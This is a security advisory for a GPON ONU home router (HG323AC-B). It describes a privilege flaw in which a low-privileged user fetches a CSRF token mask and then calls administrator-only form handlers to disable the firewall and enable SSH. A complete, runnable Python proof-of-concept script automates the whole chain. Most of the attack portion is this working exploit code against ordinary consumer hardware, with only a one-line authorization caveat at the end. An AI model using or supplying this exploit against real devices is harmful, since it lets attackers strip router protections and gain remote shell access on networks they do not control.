Item: G/EPON ONU
Specification: HG323AC-B
Device model XPON+2GE+1POTS+2WIFI+USB
Device SN 70B64F-1234570B64F0C2C0C
Hardware Version V1.0
Firmware Version V2.0.08-210715
PON S/N GPON000C2C0C
Incorrect Access Control
To exploit the vulnerability, an attacker must be authenticated as a low-privileged user; from that account it is possible to execute administrator-only functions (disable the firewall, enable SSH or Telnet, etc.).
After obtaining credentials, retrieve the CSRF token mask (csrfMask) of the current user by requesting http://IP/boaform/getASPdata/FMask.
With the valid token, assemble a POST request to disable the firewall, using the token of the current user even though that user does not have this permission. The handler that disables the firewall is /boaform/getASPdata/formFirewall, with the parameters:
FirewallLevel=0&DosEnable=0&csrfMask=<token mask of the current user>
As a result, the application responds with SUCCESS.
With the firewall disabled, enable SSH through another POST request to the handler /boaform/getASPdata/formAcc, with the parameter l_ssh (the SSH field of the access form) set to 1:
l_ssh=1
In this way a low-privileged user can disable the firewall, enable SSH, and log in over SSH with the same account.
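The sequence above, as an added proof-of-concept script that is not part of the original advisory. It uses only the Python standard library and the paths and parameters named above (FMask, formFirewall with FirewallLevel/DosEnable/csrfMask, formAcc with l_ssh). Everything else is an assumption and is marked as such in the code: that the authenticated session is carried in a cookie the operator supplies, that the FMask response contains the mask as the longest alphanumeric run in the body (the advisory does not document the response format, so a mask can also be passed explicitly), and that formAcc accepts the same csrfMask parameter as formFirewall.

```python
import re
import sys
import urllib.parse
import urllib.request

# Paths from the advisory.
FMASK_PATH = "/boaform/getASPdata/FMask"
FIREWALL_PATH = "/boaform/getASPdata/formFirewall"
ACC_PATH = "/boaform/getASPdata/formAcc"


def firewall_payload(csrf_mask):
    """Form body from the advisory: firewall level 0, DoS protection off."""
    return urllib.parse.urlencode(
        [("FirewallLevel", "0"), ("DosEnable", "0"), ("csrfMask", csrf_mask)]
    )


def ssh_payload(csrf_mask):
    """Form body that enables SSH (l_ssh=1 from the advisory).
    ASSUMPTION: formAcc takes the same csrfMask parameter as formFirewall."""
    return urllib.parse.urlencode([("l_ssh", "1"), ("csrfMask", csrf_mask)])


def extract_mask(fmask_body):
    """ASSUMPTION: the FMask response carries the token mask as the longest
    alphanumeric run (>= 8 chars) in the body. Returns None if nothing matches."""
    runs = re.findall(r"[0-9A-Za-z]{8,}", fmask_body)
    return max(runs, key=len) if runs else None


def is_success(body):
    """The advisory states the device answers SUCCESS when a form is accepted."""
    return "SUCCESS" in body


def exploit_steps(csrf_mask):
    """Ordered (path, body) pairs: firewall off first, then SSH on."""
    return [
        (FIREWALL_PATH, firewall_payload(csrf_mask)),
        (ACC_PATH, ssh_payload(csrf_mask)),
    ]


def http(base_url, path, cookie, body=None):
    """GET (body None) or form POST against the ONU web server.
    ASSUMPTION: the low-privileged session is identified by a Cookie header."""
    data = body.encode() if body is not None else None
    req = urllib.request.Request(base_url + path, data=data,
                                 method="POST" if data else "GET")
    if data:
        req.add_header("Content-Type", "application/x-www-form-urlencoded")
    if cookie:
        req.add_header("Cookie", cookie)
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode(errors="replace")


def run(base_url, cookie, csrf_mask=None):
    """Fetch the mask (unless given), then replay both form posts in order.
    Returns a list of (path, accepted) so the caller can see which step failed."""
    if csrf_mask is None:
        csrf_mask = extract_mask(http(base_url, FMASK_PATH, cookie))
        if csrf_mask is None:
            raise RuntimeError("could not find a token mask in the FMask response")
    results = []
    for path, body in exploit_steps(csrf_mask):
        accepted = is_success(http(base_url, path, cookie, body))
        results.append((path, accepted))
        if not accepted:
            break  # do not enable SSH if the firewall step was rejected
    return results


if __name__ == "__main__":
    # usage: poc.py http://IP "<session cookie>" [csrfMask]
    if len(sys.argv) < 3:
        sys.exit("usage: poc.py http://IP 'cookie' [csrfMask]")
    for p, ok in run(sys.argv[1], sys.argv[2],
                     sys.argv[3] if len(sys.argv) > 3 else None):
        print(p, "SUCCESS" if ok else "rejected")
```

The firewall step is sent first and SSH is only enabled if the device answered SUCCESS, mirroring the order in the advisory; if the FMask body on a given firmware does not match the assumed heuristic, pass the mask as the third argument instead of relying on extract_mask.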
The application does not correctly check the privilege level of the user on these form handlers.
The vulnerability allows a non-privileged user to disable all of the firewall rules, open any available service (SSH, Telnet, FTP) and connect to it, leading to remote code execution through SSH. Only do this against infrastructure for which you have received permission to test.